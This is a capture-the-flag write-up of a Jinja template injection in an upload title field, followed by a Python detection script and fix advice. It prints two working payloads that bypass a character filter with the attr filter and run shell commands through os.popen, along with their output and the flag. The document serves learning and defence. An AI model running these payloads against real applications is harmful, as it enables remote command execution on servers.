This challenge was about exploiting a server-side template injection (SSTI) in the title field of the upload form.

After a few tries, it seems that the characters `.`, `[` and `]` are all filtered.

No worries, we can replace `.` with the `|attr()` filter
and `[]` with `|attr('__getitem__')(INDEX_or_KEY)`.

The solution is quite easy, no need to go into details:
we just have to look for the `os` module in `__globals__` and execute a shell command with `popen`.

```python
{{config|attr('__class__')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('ls')|attr('read')()}}

app.py db_handler.py flag.txt patch.txt static templates uploads
```

```python
{{config|attr('__class__')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('cat flag*')|attr('read')()}}

shellmates{tR0ll1nG_@_mem3R_w1tH_4_w3ll_cr4fT3d_1nj3ct10n}
```

Flag: `shellmates{tR0ll1nG_@_mem3R_w1tH_4_w3ll_cr4fT3d_1nj3ct10n}`
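Why the character filter fails, and what a detection check on the title field could look like, as an added example that is not part of the original write-up. `naive_filter_allows` is an assumed model of the challenge's blacklist, the titles are constructed samples, and `SAMPLE_EXPR` is a non-executing prefix of the expression shown above.

```python
import re

# Assumed model of the challenge's filter: reject a title containing '.', '[' or ']'.
BLOCKED_CHARS = set(".[]")

def naive_filter_allows(title):
    """Return True when the character blacklist would let the title through."""
    return not (BLOCKED_CHARS & set(title))

# Template syntax openers: expression, statement and comment.
DELIMS = re.compile(r"\{\{|\{%|\{#")
# The attr filter reaches attributes without '.' or '[]'.
ATTR_FILTER = re.compile(r"\|\s*attr\s*\(")
# Dunder names, whichever access form carries them.
DUNDER = re.compile(r"__[A-Za-z]+__")

def ssti_findings(title):
    """Return a list of SSTI indicators found in a submitted title."""
    findings = []
    if DELIMS.search(title):
        findings.append("template-delimiter")
    if ATTR_FILTER.search(title):
        findings.append("attr-filter")
    dunders = sorted(set(DUNDER.findall(title)))
    if dunders:
        findings.append("dunder:" + ",".join(dunders))
    return findings

# Constructed samples: two ordinary titles and a prefix of the write-up's expression.
BENIGN_PLAIN = "Summer trip 2021"
BENIGN_PUNCT = "holiday.jpg [draft]"
SAMPLE_EXPR = "{{config|attr('__class__')|attr('__init__')|attr('__globals__')}}"

def triage(titles):
    """Map each title to (passes_blacklist, findings) for side-by-side review."""
    return {t: (naive_filter_allows(t), ssti_findings(t)) for t in titles}

if __name__ == "__main__":
    for title, (allowed, findings) in triage(
        [BENIGN_PLAIN, BENIGN_PUNCT, SAMPLE_EXPR]
    ).items():
        print(f"blacklist_allows={allowed!s:5} findings={findings} title={title!r}")
```

The blacklist rejects the harmless `holiday.jpg [draft]` while letting the template expression through. A check like this is for logging and alerting; the fix itself is to pass the title to the template as a variable instead of rendering it as template source.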